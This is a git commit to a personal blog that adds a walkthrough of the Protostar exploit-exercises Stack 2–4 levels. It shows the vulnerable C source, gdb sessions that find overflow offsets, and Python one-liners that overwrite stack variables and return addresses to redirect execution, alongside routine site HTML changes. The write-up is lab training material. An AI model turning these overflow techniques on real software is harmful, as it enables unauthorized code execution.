protostar update

2016-06-19 02:39:15 -04:00 · 2016-06-19 02:39:15 -04:00 · 55a8e2b3ed
parent c77d375000
commit 55a8e2b3ed
11 changed files with 535 additions and 31 deletions
--- a/Walko_Paul-Resume.pdf
+++ b/Walko_Paul-Resume.pdf
--- a/_posts/2016-06-14-nebula_exploit_exercises.md
+++ b/_posts/2016-06-14-nebula_exploit_exercises.md
@ -1,11 +1,13 @@
 ---
-title: "Protostar Exploit Exercises Solutions 0-1"
+title: "Protostar Exploit Exercises Solutions 0-4"
 layout: post
 category: writeup
 tags: [exploit-exercises, protostar, hacking]
 excerpt: "Walkthrough for Protostar exercises on exploit-exercises.com"
 ---
 Note: When you first logon to protostar, make sure you are actually using bash. It will make things a lot easier.
 # Stack 0
 Here's what we're given:
@ -97,3 +99,217 @@ you have correctly got the variable to the right value
 ```
 Woo!
 # Stack 2
 The website says this one involves environment variables, and how they can be set, so let's look at the code:
 ```
 #include <stdlib.h>
 #include <unistd.h>
 #include <stdio.h>
 #include <string.h>
 int main(int argc, char **argv)
 {
  volatile int modified;
  char buffer[64];
  char *variable;
  variable = getenv("GREENIE");
  if(variable == NULL) {
      errx(1, "please set the GREENIE environment variable\n");
  }
  modified = 0;
  strcpy(buffer, variable);
  if(modified == 0x0d0a0d0a) {
      printf("you have correctly modified the variable\n");
  } else {
      printf("Try again, you got 0x%08x\n", modified);
  }
 }
 ```
 There's the ```char buffer[64]``` and ```char *variable``` again, then shortly after that it reads in the ```GREENIE``` environmental variable. Since ```GREENIE``` is copied to ```buffer```, let's see if appending ```0x0d0a0d0a``` to the end of some 64 bit string, since that's what it compares in the if statement:
 ```
 user@protostar:/opt/protostar/bin$  export GREENIE=`python -c 'print "A"*64+"\x0a\x0d\x0a\x0d"'`
 user@protostar:/opt/protostar/bin$ ./stack2
 you have correctly modified the variable
 ```
 # Stack 3
 ```
 #include <stdlib.h>
 #include <unistd.h>
 #include <stdio.h>
 #include <string.h>
 void win()
 {
  printf("code flow successfully changed\n");
 }
 int main(int argc, char **argv)
 {
  volatile int (*fp)();
  char buffer[64];
  fp = 0;
  gets(buffer);
  if(fp) {
      printf("calling function pointer, jumping to 0x%08x\n", fp);
      fp();
  }
 }
 ```
 It looks like I need to input a 64 byte buffer like previously, and then append the address of ```win()```, which will write to ```fp```.
 First to figure out the address of win I ran ```objdump -d stack3 | grep win``` which outputs ```08048424```:
 ```
 user@protostar:/opt/protostar/bin$ objdump -d stack3 | grep win
 08048424 <win>:
 ```
 And appending it to the buffer:
 ```
 user@protostar:/opt/protostar/bin$ echo `python -c 'print "A"*64 + "\x24\x84\x04\x08"'` | ./stack3
 calling function pointer, jumping to 0x08048424
 code flow successfully changed
 ```
 # Stack 4
 ```
 #include <stdlib.h>
 #include <unistd.h>
 #include <stdio.h>
 #include <string.h>
 void win()
 {
  printf("code flow successfully changed\n");
 }
 int main(int argc, char **argv)
 {
  char buffer[64];
  gets(buffer);
 }
 ```
 This is similar to Stack 3, except it I need to add some extra padding to get to ```win```.
 First I'm going to get the memory address of ```win```, but I won't use this till the end:
 ```
 user@protostar:/opt/protostar/bin$ objdump -d stack4 | grep win
 080483f4 <win>:
 ```
 Now to figure out the padding, I ran gdb with and used binary search to figure out what the max buffer is:
 First with predefined buffers of 50 and 100:
 ```
 GNU gdb (GDB) 7.0.1-debian
 Copyright (C) 2009 Free Software Foundation, Inc.
 License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
 This is free software: you are free to change and redistribute it.
 There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
 and "show warranty" for details.
 This GDB was configured as "i486-linux-gnu".
 For bug reporting instructions, please see:
 <http://www.gnu.org/software/gdb/bugs/>...
 Reading symbols from /opt/protostar/bin/stack4...done.
 (gdb) r   // with 50
 Starting program: /opt/protostar/bin/stack4
 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 Program exited with code 060.
 (gdb) r   // with 100
 Starting program: /opt/protostar/bin/stack4
 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 Program received signal SIGSEGV, Segmentation fault.
 0x41414141 in ?? ()
 (gdb) r   // with ~75
 The program being debugged has been started already.
 Start it from the beginning? (y or n) y
 Starting program: /opt/protostar/bin/stack4
 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 Program exited with code 060.
 (gdb) r   //with ~80
 Starting program: /opt/protostar/bin/stack4
 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 Program received signal SIGSEGV, Segmentation fault.
 0x41414141 in ?? ()
 ```
 And now I figured out it's somewhere around 80 by approximation, so I guessed than then 75, then 76:
 ```
 user@protostar:/opt/protostar/bin$ gdb ./stack4
 GNU gdb (GDB) 7.0.1-debian
 Copyright (C) 2009 Free Software Foundation, Inc.
 License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
 This is free software: you are free to change and redistribute it.
 There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
 and "show warranty" for details.
 This GDB was configured as "i486-linux-gnu".
 For bug reporting instructions, please see:
 <http://www.gnu.org/software/gdb/bugs/>...
 Reading symbols from /opt/protostar/bin/stack4...done.
 (gdb) r   // with 80
 Starting program: /opt/protostar/bin/stack4
 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 Program received signal SIGSEGV, Segmentation fault.
 0x41414141 in ?? ()
 (gdb) r   // with 75
 The program being debugged has been started already.
 Start it from the beginning? (y or n) y
 Starting program: /opt/protostar/bin/stack4
 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA     
 Program exited with code 060.
 (gdb) r   // with 76
 Starting program: /opt/protostar/bin/stack4
 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA    
 Program received signal SIGSEGV, Segmentation fault.
 0xb7eadc03 in __libc_start_main (main=Cannot access memory at address 0x41414149
 ) at libc-start.c:187
 187     libc-start.c: No such file or directory.
        in libc-start.c
 (gdb) Woo => 76
 ```
 Alright, so I know the buffer I need is 76, and the memory address of ```win```:
 ```
 user@protostar:/opt/protostar/bin$ echo `python -c 'print "A"*76 + "\xf4\x83\x04\x08"'` | ./stack4
 code flow successfully changed
 ```
 There you go.
 # Stack 5
 Finally, we get to do some shellcode!
 I have a good idea about how to do this, but unfortunately I can't get something to work right, so I'll update this as soon as I do.
--- a/_site/404.html
+++ b/_site/404.html
@ -5,11 +5,22 @@
 <html>
 <head>
    <meta charset="utf-8">
-<script type="text/javascript">
+<!--<script type="text/javascript">
    var host = "paul.walko.org";
    if ((host == window.location.host) && (window.location.protocol != "https:"))
        window.location.protocol = "https";
 </script>
 -->
 <script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');
  ga('create', 'UA-79393488-1', 'auto');
  ga('send', 'pageview');
 </script>
 <meta http-equiv="X-UA-Compatible" content="IE=edge">
 <meta name="viewport" content="width=device-width, initial-scale=1">
 <meta name="description" content="Paul Walko's personal website">
@ -41,8 +52,9 @@
 <script type="text/javascript" src="http://localhost:4000/javascripts/jquery.js"></script>
-
+<!--
 <link rel="canonical" href=" { { site.url } }{ { page.url } }" />
 -->
 <!--[if lt IE 9]>
 <script src="http://localhost:4000/javascripts/html5shiv.js"></script>
@ -75,7 +87,7 @@
                        </ul>
                    </li>
                    <li class="col-lg-3"><a href="http://localhost:4000/about">ABOUT</a></li>
-                    <li class="col-lg-3"><a href="http://localhost:4000/resume">RÉSUMÉ</a></li>
+                    <li class="col-lg-3"><a href="http://localhost:4000/Walko_Paul-Resume.pdf">RÉSUMÉ</a></li>
                </ul>
            </nav>
--- a/_site/Walko_Paul-Resume.pdf
+++ b/_site/Walko_Paul-Resume.pdf
--- a/_site/about/index.html
+++ b/_site/about/index.html
@ -5,11 +5,22 @@
 <html>
 <head>
    <meta charset="utf-8">
-<script type="text/javascript">
+<!--<script type="text/javascript">
    var host = "paul.walko.org";
    if ((host == window.location.host) && (window.location.protocol != "https:"))
        window.location.protocol = "https";
 </script>
 -->
 <script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');
  ga('create', 'UA-79393488-1', 'auto');
  ga('send', 'pageview');
 </script>
 <meta http-equiv="X-UA-Compatible" content="IE=edge">
 <meta name="viewport" content="width=device-width, initial-scale=1">
 <meta name="description" content="Paul Walko's personal website">
@ -41,8 +52,9 @@
 <script type="text/javascript" src="http://localhost:4000/javascripts/jquery.js"></script>
-
+<!--
 <link rel="canonical" href=" { { site.url } }{ { page.url } }" />
 -->
 <!--[if lt IE 9]>
 <script src="http://localhost:4000/javascripts/html5shiv.js"></script>
@ -75,7 +87,7 @@
                        </ul>
                    </li>
                    <li class="col-lg-3"><a href="http://localhost:4000/about">ABOUT</a></li>
-                    <li class="col-lg-3"><a href="http://localhost:4000/resume">RÉSUMÉ</a></li>
+                    <li class="col-lg-3"><a href="http://localhost:4000/Walko_Paul-Resume.pdf">RÉSUMÉ</a></li>
                </ul>
            </nav>
@ -168,7 +180,7 @@
    <section id="action">
        <h2></small>Contact Me</small></h2>
-        <a href="http://localhost:4000/resume">View my resume</a>
+        <a href="http://localhost:4000/Walko_Paul-Resume.pdf">View my resume</a>
        <span> or </span>
        <a href="mailto:paulsw.pw@gmail.com">e-mail me</a>
    </section>
--- a/_site/category/index.html
+++ b/_site/category/index.html
@ -5,11 +5,22 @@
 <html>
 <head>
    <meta charset="utf-8">
-<script type="text/javascript">
+<!--<script type="text/javascript">
    var host = "paul.walko.org";
    if ((host == window.location.host) && (window.location.protocol != "https:"))
        window.location.protocol = "https";
 </script>
 -->
 <script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');
  ga('create', 'UA-79393488-1', 'auto');
  ga('send', 'pageview');
 </script>
 <meta http-equiv="X-UA-Compatible" content="IE=edge">
 <meta name="viewport" content="width=device-width, initial-scale=1">
 <meta name="description" content="Paul Walko's personal website">
@ -41,8 +52,9 @@
 <script type="text/javascript" src="http://localhost:4000/javascripts/jquery.js"></script>
-
+<!--
 <link rel="canonical" href=" { { site.url } }{ { page.url } }" />
 -->
 <!--[if lt IE 9]>
 <script src="http://localhost:4000/javascripts/html5shiv.js"></script>
@ -75,7 +87,7 @@
                        </ul>
                    </li>
                    <li class="col-lg-3"><a href="http://localhost:4000/about">ABOUT</a></li>
-                    <li class="col-lg-3"><a href="http://localhost:4000/resume">RÉSUMÉ</a></li>
+                    <li class="col-lg-3"><a href="http://localhost:4000/Walko_Paul-Resume.pdf">RÉSUMÉ</a></li>
                </ul>
            </nav>
@ -148,7 +160,7 @@
    </div>
    <div class="col-lg-10 col-md-10 col-sm-10">
-        <h2 class="title"><a href="/writeup/nebula_exploit_exercises">Protostar Exploit Exercises Solutions 0-1</a></h2>
+        <h2 class="title"><a href="/writeup/nebula_exploit_exercises">Protostar Exploit Exercises Solutions 0-4</a></h2>
        <ul class="tags">
            <li><i class="fa fa-tag"> exploit-exercises</i></li>
--- a/_site/index.html
+++ b/_site/index.html
@ -5,11 +5,22 @@
 <html>
 <head>
    <meta charset="utf-8">
-<script type="text/javascript">
+<!--<script type="text/javascript">
    var host = "paul.walko.org";
    if ((host == window.location.host) && (window.location.protocol != "https:"))
        window.location.protocol = "https";
 </script>
 -->
 <script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');
  ga('create', 'UA-79393488-1', 'auto');
  ga('send', 'pageview');
 </script>
 <meta http-equiv="X-UA-Compatible" content="IE=edge">
 <meta name="viewport" content="width=device-width, initial-scale=1">
 <meta name="description" content="Paul Walko's personal website">
@ -41,8 +52,9 @@
 <script type="text/javascript" src="http://localhost:4000/javascripts/jquery.js"></script>
-
+<!--
 <link rel="canonical" href=" { { site.url } }{ { page.url } }" />
 -->
 <!--[if lt IE 9]>
 <script src="http://localhost:4000/javascripts/html5shiv.js"></script>
@ -75,7 +87,7 @@
                        </ul>
                    </li>
                    <li class="col-lg-3"><a href="http://localhost:4000/about">ABOUT</a></li>
-                    <li class="col-lg-3"><a href="http://localhost:4000/resume">RÉSUMÉ</a></li>
+                    <li class="col-lg-3"><a href="http://localhost:4000/Walko_Paul-Resume.pdf">RÉSUMÉ</a></li>
                </ul>
            </nav>
@ -116,7 +128,7 @@
    </div>
    <div class="col-lg-10 col-md-10 col-sm-10">
-        <h2 class="title"><a href="/writeup/nebula_exploit_exercises">Protostar Exploit Exercises Solutions 0-1</a></h2>
+        <h2 class="title"><a href="/writeup/nebula_exploit_exercises">Protostar Exploit Exercises Solutions 0-4</a></h2>
        <ul class="tags">
            <li><i class="fa fa-tag"> exploit-exercises</i></li>
--- a/_site/sitemap.txt
+++ b/_site/sitemap.txt
@ -1,4 +1,4 @@
-https://paul.walko.org//writeup/nebula_exploit_exercises
+http://paul.walko.org//writeup/nebula_exploit_exercises
--- a/_site/sitemap.xml
+++ b/_site/sitemap.xml
@ -5,8 +5,8 @@
        http://www.sitemaps.org/schemas/sitemap/0.9/sitemap.xsd">
    <url>
-        <loc>https://paul.walko.org//writeup/nebula_exploit_exercises</loc>
+        <loc>http://paul.walko.org//writeup/nebula_exploit_exercises</loc>
-        <lastmod>2016-06-15T01:37:41-04:00</lastmod>
+        <lastmod>2016-06-19T02:35:49-04:00</lastmod>
        <changefreq>weekly</changefreq>
    </url>
--- a/_site/tag/index.html
+++ b/_site/tag/index.html
@ -5,11 +5,22 @@
 <html>
 <head>
    <meta charset="utf-8">
-<script type="text/javascript">
+<!--<script type="text/javascript">
    var host = "paul.walko.org";
    if ((host == window.location.host) && (window.location.protocol != "https:"))
        window.location.protocol = "https";
 </script>
 -->
 <script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');
  ga('create', 'UA-79393488-1', 'auto');
  ga('send', 'pageview');
 </script>
 <meta http-equiv="X-UA-Compatible" content="IE=edge">
 <meta name="viewport" content="width=device-width, initial-scale=1">
 <meta name="description" content="Paul Walko's personal website">
@ -41,8 +52,9 @@
 <script type="text/javascript" src="http://localhost:4000/javascripts/jquery.js"></script>
-
+<!--
 <link rel="canonical" href=" { { site.url } }{ { page.url } }" />
 -->
 <!--[if lt IE 9]>
 <script src="http://localhost:4000/javascripts/html5shiv.js"></script>
@ -75,7 +87,7 @@
                        </ul>
                    </li>
                    <li class="col-lg-3"><a href="http://localhost:4000/about">ABOUT</a></li>
-                    <li class="col-lg-3"><a href="http://localhost:4000/resume">RÉSUMÉ</a></li>
+                    <li class="col-lg-3"><a href="http://localhost:4000/Walko_Paul-Resume.pdf">RÉSUMÉ</a></li>
                </ul>
            </nav>
@ -167,7 +179,7 @@
    </div>
    <div class="col-lg-10 col-md-10 col-sm-10">
-        <h2 class="title"><a href="/writeup/nebula_exploit_exercises">Protostar Exploit Exercises Solutions 0-1</a></h2>
+        <h2 class="title"><a href="/writeup/nebula_exploit_exercises">Protostar Exploit Exercises Solutions 0-4</a></h2>
        <ul class="tags">
            <li><i class="fa fa-tag"> exploit-exercises</i></li>
@ -235,7 +247,7 @@
    </div>
    <div class="col-lg-10 col-md-10 col-sm-10">
-        <h2 class="title"><a href="/writeup/nebula_exploit_exercises">Protostar Exploit Exercises Solutions 0-1</a></h2>
+        <h2 class="title"><a href="/writeup/nebula_exploit_exercises">Protostar Exploit Exercises Solutions 0-4</a></h2>
        <ul class="tags">
            <li><i class="fa fa-tag"> exploit-exercises</i></li>
@ -299,7 +311,7 @@
    </div>
    <div class="col-lg-10 col-md-10 col-sm-10">
-        <h2 class="title"><a href="/writeup/nebula_exploit_exercises">Protostar Exploit Exercises Solutions 0-1</a></h2>
+        <h2 class="title"><a href="/writeup/nebula_exploit_exercises">Protostar Exploit Exercises Solutions 0-4</a></h2>
        <ul class="tags">
            <li><i class="fa fa-tag"> exploit-exercises</i></li>
--- a/_site/writeup/nebula_exploit_exercises.html
+++ b/_site/writeup/nebula_exploit_exercises.html
@ -5,16 +5,27 @@
 <html>
 <head>
    <meta charset="utf-8">
-<script type="text/javascript">
+<!--<script type="text/javascript">
    var host = "paul.walko.org";
    if ((host == window.location.host) && (window.location.protocol != "https:"))
        window.location.protocol = "https";
 </script>
 -->
 <script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');
  ga('create', 'UA-79393488-1', 'auto');
  ga('send', 'pageview');
 </script>
 <meta http-equiv="X-UA-Compatible" content="IE=edge">
 <meta name="viewport" content="width=device-width, initial-scale=1">
 <meta name="description" content="Walkthrough for Protostar exercises on exploit-exercises.com">
-<title>Protostar Exploit Exercises Solutions 0-1</title>
+<title>Protostar Exploit Exercises Solutions 0-4</title>
 <!-- favicon -->
 <link rel="apple-touch-icon" sizes="57x57" href="http://localhost:4000/favicon/apple-icon-57x57.png">
@ -41,8 +52,9 @@
 <script type="text/javascript" src="http://localhost:4000/javascripts/jquery.js"></script>
-
+<!--
 <link rel="canonical" href=" { { site.url } }{ { page.url } }" />
 -->
 <!--[if lt IE 9]>
 <script src="http://localhost:4000/javascripts/html5shiv.js"></script>
@ -79,7 +91,7 @@
                        </ul>
                    </li>
                    <li class="col-lg-3"><a href="http://localhost:4000/about">ABOUT</a></li>
-                    <li class="col-lg-3"><a href="http://localhost:4000/resume">RÉSUMÉ</a></li>
+                    <li class="col-lg-3"><a href="http://localhost:4000/Walko_Paul-Resume.pdf">RÉSUMÉ</a></li>
                </ul>
            </nav>
@ -109,7 +121,7 @@
        <div class="row">
            <div id="markdown-container" class="col-lg-9">
                <header>
-                    <p id="postTitle">Protostar Exploit Exercises Solutions 0-1</p>
+                    <p id="postTitle">Protostar Exploit Exercises Solutions 0-4</p>
                    <ul class="tags clearfix">
@ -125,7 +137,9 @@
                </header>
-                <h1 id="stack-0">Stack 0</h1>
+                <p>Note: When you first logon to protostar, make sure you are actually using bash. It will make things a lot easier.</p>
 <h1 id="stack-0">Stack 0</h1>
 <p>Here’s what we’re given:</p>
@ -215,6 +229,220 @@ you have correctly got the variable to the right value
 <p>Woo!</p>
 <h1 id="stack-2">Stack 2</h1>
 <p>The website says this one involves environment variables, and how they can be set, so let’s look at the code:</p>
 <div class="highlighter-rouge"><pre class="highlight"><code>#include &lt;stdlib.h&gt;
 #include &lt;unistd.h&gt;
 #include &lt;stdio.h&gt;
 #include &lt;string.h&gt;
 int main(int argc, char **argv)
 {
  volatile int modified;
  char buffer[64];
  char *variable;
  variable = getenv("GREENIE");
  if(variable == NULL) {
      errx(1, "please set the GREENIE environment variable\n");
  }
  modified = 0;
  strcpy(buffer, variable);
  if(modified == 0x0d0a0d0a) {
      printf("you have correctly modified the variable\n");
  } else {
      printf("Try again, you got 0x%08x\n", modified);
  }
 }
 </code></pre>
 </div>
 <p>There’s the <code class="highlighter-rouge">char buffer[64]</code> and <code class="highlighter-rouge">char *variable</code> again, then shortly after that it reads in the <code class="highlighter-rouge">GREENIE</code> environmental variable. Since <code class="highlighter-rouge">GREENIE</code> is copied to <code class="highlighter-rouge">buffer</code>, let’s see if appending <code class="highlighter-rouge">0x0d0a0d0a</code> to the end of some 64 bit string, since that’s what it compares in the if statement:</p>
 <div class="highlighter-rouge"><pre class="highlight"><code>user@protostar:/opt/protostar/bin$  export GREENIE=`python -c 'print "A"*64+"\x0a\x0d\x0a\x0d"'`
 user@protostar:/opt/protostar/bin$ ./stack2
 you have correctly modified the variable
 </code></pre>
 </div>
 <h1 id="stack-3">Stack 3</h1>
 <div class="highlighter-rouge"><pre class="highlight"><code>#include &lt;stdlib.h&gt;
 #include &lt;unistd.h&gt;
 #include &lt;stdio.h&gt;
 #include &lt;string.h&gt;
 void win()
 {
  printf("code flow successfully changed\n");
 }
 int main(int argc, char **argv)
 {
  volatile int (*fp)();
  char buffer[64];
  fp = 0;
  gets(buffer);
  if(fp) {
      printf("calling function pointer, jumping to 0x%08x\n", fp);
      fp();
  }
 }
 </code></pre>
 </div>
 <p>It looks like I need to input a 64 byte buffer like previously, and then append the address of <code class="highlighter-rouge">win()</code>, which will write to <code class="highlighter-rouge">fp</code>.</p>
 <p>First to figure out the address of win I ran <code class="highlighter-rouge">objdump -d stack3 | grep win</code> which outputs <code class="highlighter-rouge">08048424</code>:</p>
 <div class="highlighter-rouge"><pre class="highlight"><code>user@protostar:/opt/protostar/bin$ objdump -d stack3 | grep win
 08048424 &lt;win&gt;:
 </code></pre>
 </div>
 <p>And appending it to the buffer:</p>
 <div class="highlighter-rouge"><pre class="highlight"><code>user@protostar:/opt/protostar/bin$ echo `python -c 'print "A"*64 + "\x24\x84\x04\x08"'` | ./stack3
 calling function pointer, jumping to 0x08048424
 code flow successfully changed
 </code></pre>
 </div>
 <h1 id="stack-4">Stack 4</h1>
 <div class="highlighter-rouge"><pre class="highlight"><code>#include &lt;stdlib.h&gt;
 #include &lt;unistd.h&gt;
 #include &lt;stdio.h&gt;
 #include &lt;string.h&gt;
 void win()
 {
  printf("code flow successfully changed\n");
 }
 int main(int argc, char **argv)
 {
  char buffer[64];
  gets(buffer);
 }
 </code></pre>
 </div>
 <p>This is similar to Stack 3, except it I need to add some extra padding to get to <code class="highlighter-rouge">win</code>.</p>
 <p>First I’m going to get the memory address of <code class="highlighter-rouge">win</code>, but I won’t use this till the end:</p>
 <div class="highlighter-rouge"><pre class="highlight"><code>user@protostar:/opt/protostar/bin$ objdump -d stack4 | grep win
 080483f4 &lt;win&gt;:
 </code></pre>
 </div>
 <p>Now to figure out the padding, I ran gdb with and used binary search to figure out what the max buffer is:</p>
 <p>First with predefined buffers of 50 and 100:</p>
 <div class="highlighter-rouge"><pre class="highlight"><code>GNU gdb (GDB) 7.0.1-debian
 Copyright (C) 2009 Free Software Foundation, Inc.
 License GPLv3+: GNU GPL version 3 or later &lt;http://gnu.org/licenses/gpl.html&gt;
 This is free software: you are free to change and redistribute it.
 There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
 and "show warranty" for details.
 This GDB was configured as "i486-linux-gnu".
 For bug reporting instructions, please see:
 &lt;http://www.gnu.org/software/gdb/bugs/&gt;...
 Reading symbols from /opt/protostar/bin/stack4...done.
 (gdb) r   // with 50
 Starting program: /opt/protostar/bin/stack4
 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 Program exited with code 060.
 (gdb) r   // with 100
 Starting program: /opt/protostar/bin/stack4
 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 Program received signal SIGSEGV, Segmentation fault.
 0x41414141 in ?? ()
 (gdb) r   // with ~75
 The program being debugged has been started already.
 Start it from the beginning? (y or n) y
 Starting program: /opt/protostar/bin/stack4
 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 Program exited with code 060.
 (gdb) r   //with ~80
 Starting program: /opt/protostar/bin/stack4
 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 Program received signal SIGSEGV, Segmentation fault.
 0x41414141 in ?? ()
 </code></pre>
 </div>
 <p>And now I figured out it’s somewhere around 80 by approximation, so I guessed than then 75, then 76:</p>
 <div class="highlighter-rouge"><pre class="highlight"><code>user@protostar:/opt/protostar/bin$ gdb ./stack4
 GNU gdb (GDB) 7.0.1-debian
 Copyright (C) 2009 Free Software Foundation, Inc.
 License GPLv3+: GNU GPL version 3 or later &lt;http://gnu.org/licenses/gpl.html&gt;
 This is free software: you are free to change and redistribute it.
 There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
 and "show warranty" for details.
 This GDB was configured as "i486-linux-gnu".
 For bug reporting instructions, please see:
 &lt;http://www.gnu.org/software/gdb/bugs/&gt;...
 Reading symbols from /opt/protostar/bin/stack4...done.
 (gdb) r   // with 80
 Starting program: /opt/protostar/bin/stack4
 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 Program received signal SIGSEGV, Segmentation fault.
 0x41414141 in ?? ()
 (gdb) r   // with 75
 The program being debugged has been started already.
 Start it from the beginning? (y or n) y
 Starting program: /opt/protostar/bin/stack4
 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA     
 Program exited with code 060.
 (gdb) r   // with 76
 Starting program: /opt/protostar/bin/stack4
 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA    
 Program received signal SIGSEGV, Segmentation fault.
 0xb7eadc03 in __libc_start_main (main=Cannot access memory at address 0x41414149
 ) at libc-start.c:187
 187     libc-start.c: No such file or directory.
        in libc-start.c
 (gdb) Woo =&gt; 76
 </code></pre>
 </div>
 <p>Alright, so I know the buffer I need is 76, and the memory address of <code class="highlighter-rouge">win</code>:</p>
 <div class="highlighter-rouge"><pre class="highlight"><code>user@protostar:/opt/protostar/bin$ echo `python -c 'print "A"*76 + "\xf4\x83\x04\x08"'` | ./stack4
 code flow successfully changed
 </code></pre>
 </div>
 <p>There you go.</p>
 <h1 id="stack-5">Stack 5</h1>
 <p>Finally, we get to do some shellcode!</p>
 <p>I have a good idea about how to do this, but unfortunately I can’t get something to work right, so I’ll update this as soon as I do.</p>
            </div>
            <div id="markdown-outline" class="col-lg-3">
`@ -1,4 +1,4 @@`
	`https://paul.walko.org//writeup/nebula_exploit_exercises`	`http://paul.walko.org//writeup/nebula_exploit_exercises`